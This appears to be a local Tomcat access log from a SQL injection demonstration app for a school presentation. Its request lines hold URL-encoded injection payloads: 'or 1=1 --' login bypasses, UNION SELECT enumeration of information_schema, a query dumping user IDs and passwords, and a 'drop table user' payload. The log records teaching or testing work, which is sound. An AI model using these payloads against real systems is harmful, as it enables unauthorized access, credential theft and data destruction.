0:0:0:0:0:0:0:1 - - [20/Jan/2019:09:40:19 +0200] "GET /SQLInjectionReferat HTTP/1.1" 302 - http-bio-8080-exec-2 0
0:0:0:0:0:0:0:1 - - [20/Jan/2019:09:40:19 +0200] "GET /SQLInjectionReferat/ HTTP/1.1" 200 8130 http-bio-8080-exec-4 543
0:0:0:0:0:0:0:1 - - [20/Jan/2019:09:40:19 +0200] "GET /favicon.ico HTTP/1.1" 404 - http-bio-8080-exec-5 0
0:0:0:0:0:0:0:1 - - [20/Jan/2019:09:40:37 +0200] "GET /SQLInjectionReferat/userCheck?username=something%27+or+1%3D1+--&password=%27 HTTP/1.1" 200 660 http-bio-8080-exec-6 179
0:0:0:0:0:0:0:1 - - [20/Jan/2019:09:42:12 +0200] "GET /SQLInjectionReferat/example0?username=sandeep&password= HTTP/1.1" 200 178 http-bio-8080-exec-9 28
0:0:0:0:0:0:0:1 - - [20/Jan/2019:09:42:26 +0200] "GET /SQLInjectionReferat/example0?username=%27sandeep%27&password= HTTP/1.1" 200 422 http-bio-8080-exec-9 12
0:0:0:0:0:0:0:1 - - [20/Jan/2019:09:44:37 +0200] "GET /SQLInjectionReferat/example0?username=%27sandeep%27&password= HTTP/1.1" 200 383 http-bio-8080-exec-1 193
0:0:0:0:0:0:0:1 - - [20/Jan/2019:09:46:45 +0200] "GET /SQLInjectionReferat/example0?username=%27+%27+union+select+table_schema+from+information_schema.tables+union+select+%271%27&password= HTTP/1.1" 200 248 http-bio-8080-exec-5 23
0:0:0:0:0:0:0:1 - - [20/Jan/2019:09:48:39 +0200] "GET /SQLInjectionReferat/example0?username=%27+%27+union+select+1%2C+1%2C+1%2C+1%2C+1%2C+1%2C+1%2Ctable_schema+from+information_schema.tables+union+select+1%2C1%2C1%2C1%2C1%2C1%2C1%2C%271%27+&password= HTTP/1.1" 200 1463 http-bio-8080-exec-9 15
0:0:0:0:0:0:0:1 - - [20/Jan/2019:09:56:28 +0200] "GET /SQLInjectionReferat/example0?username=%27+%27+union+select+1%2C+1%2C+1%2C+1%2C+1%2C+1%2C+1%2Ctable_schema+from+information_schema.tables+union+select+1%2C1%2C1%2C1%2C1%2C1%2C1%2C%271%27&password= HTTP/1.1" 200 1462 http-bio-8080-exec-4 11
0:0:0:0:0:0:0:1 - - [20/Jan/2019:09:57:12 +0200] "GET /SQLInjectionReferat/example0?username=%27+%27+union+select+1%2C+1%2C+1%2C+1%2C+1%2C+1%2C+1%2Ctable_name+from+information_schema.tables+where+table_schema+%3D+%27test%27+union+select+1%2C1%2C1%2C1%2C1%2C1%2C1%2C%271%27&password= HTTP/1.1" 200 700 http-bio-8080-exec-4 5
0:0:0:0:0:0:0:1 - - [20/Jan/2019:09:58:38 +0200] "GET /SQLInjectionReferat/example0?username=%27+%27+union+select+1%2C+1%2C+1%2C+1%2C+1%2C+1%2C+1%2Ccolumn_name+from+information_schema.columns+where+table_name+%3D+%27user%27+union+select+1%2C1%2C1%2C1%2C1%2C1%2C1%2C%271%27&password= HTTP/1.1" 200 8071 http-bio-8080-exec-9 72
0:0:0:0:0:0:0:1 - - [20/Jan/2019:09:59:58 +0200] "GET /SQLInjectionReferat/userCheck?username=+%27+or+1%3D1+--+&password=%27 HTTP/1.1" 200 653 http-bio-8080-exec-5 8
0:0:0:0:0:0:0:1 - - [20/Jan/2019:10:19:44 +0200] "GET /SQLInjectionReferat/example0?username=%27+%27+or+1+%3D+%271%27+&password= HTTP/1.1" 200 3762 http-bio-8080-exec-8 9
0:0:0:0:0:0:0:1 - - [20/Jan/2019:10:20:39 +0200] "GET /SQLInjectionReferat/example0?username=%27+%27+union+select+table_schema+from+information_schema.tables+union+select+%271%27+&password= HTTP/1.1" 200 249 http-bio-8080-exec-8 18
0:0:0:0:0:0:0:1 - - [20/Jan/2019:10:22:02 +0200] "GET /SQLInjectionReferat/example0?username=%27+%27+union+select+1%2C+1%2C+1%2C+1%2C+1%2C+1%2C+1%2Ctable_schema+from+information_schema.tables+union+select+1%2C1%2C1%2C1%2C1%2C1%2C1%2C%271%27+&password= HTTP/1.1" 200 1463 http-bio-8080-exec-6 14
0:0:0:0:0:0:0:1 - - [20/Jan/2019:10:22:42 +0200] "GET /SQLInjectionReferat/example0?username=%27+%27+union+select+1%2C+1%2C+1%2C+1%2C+1%2C+1%2C+1%2Ctable_name+from+information_schema.tables+where+table_schema+%3D+%27test%27+union+select+1%2C1%2C1%2C1%2C1%2C1%2C1%2C%271%27&password= HTTP/1.1" 200 700 http-bio-8080-exec-6 8
0:0:0:0:0:0:0:1 - - [20/Jan/2019:10:23:34 +0200] "GET /SQLInjectionReferat/example0?username=%27+%27+union+select+1%2C+1%2C+1%2C+1%2C+1%2C+1%2C+1%2Ccolumn_name+from+information_schema.columns+where+table_name+%3D+%27user%27+union+select+1%2C1%2C1%2C1%2C1%2C1%2C1%2C%271%27&password= HTTP/1.1" 200 8071 http-bio-8080-exec-6 84
0:0:0:0:0:0:0:1 - - [20/Jan/2019:10:24:27 +0200] "GET /SQLInjectionReferat/example0?username=%27+%27+union+select+1%2C+1%2C+1%2C+1%2C+1%2C+1%2C+1%2Cconcat%28userId%2C+%22%3A%22%2Cpassword%29+from+User+union+all+select+1%2C1%2C1%2C1%2C1%2C1%2C1%2C%271%27&password= HTTP/1.1" 200 3279 http-bio-8080-exec-6 15
0:0:0:0:0:0:0:1 - - [20/Jan/2019:10:25:20 +0200] "GET /SQLInjectionReferat/userCheck?username=+something%27+or+1%3D1+--&password=%27 HTTP/1.1" 200 661 http-bio-8080-exec-6 13
0:0:0:0:0:0:0:1 - - [20/Jan/2019:10:27:03 +0200] "GET /SQLInjectionReferat/userCheckCorrection?username=+%27+or+1%3D1+--&password=%27 HTTP/1.1" 200 208 http-bio-8080-exec-3 18
0:0:0:0:0:0:0:1 - - [20/Jan/2019:10:28:21 +0200] "GET /SQLInjectionReferat/userCheck?username=sandeep&password=+%27%3Bdrop+table+user+-- HTTP/1.1" 200 215 http-bio-8080-exec-1 25
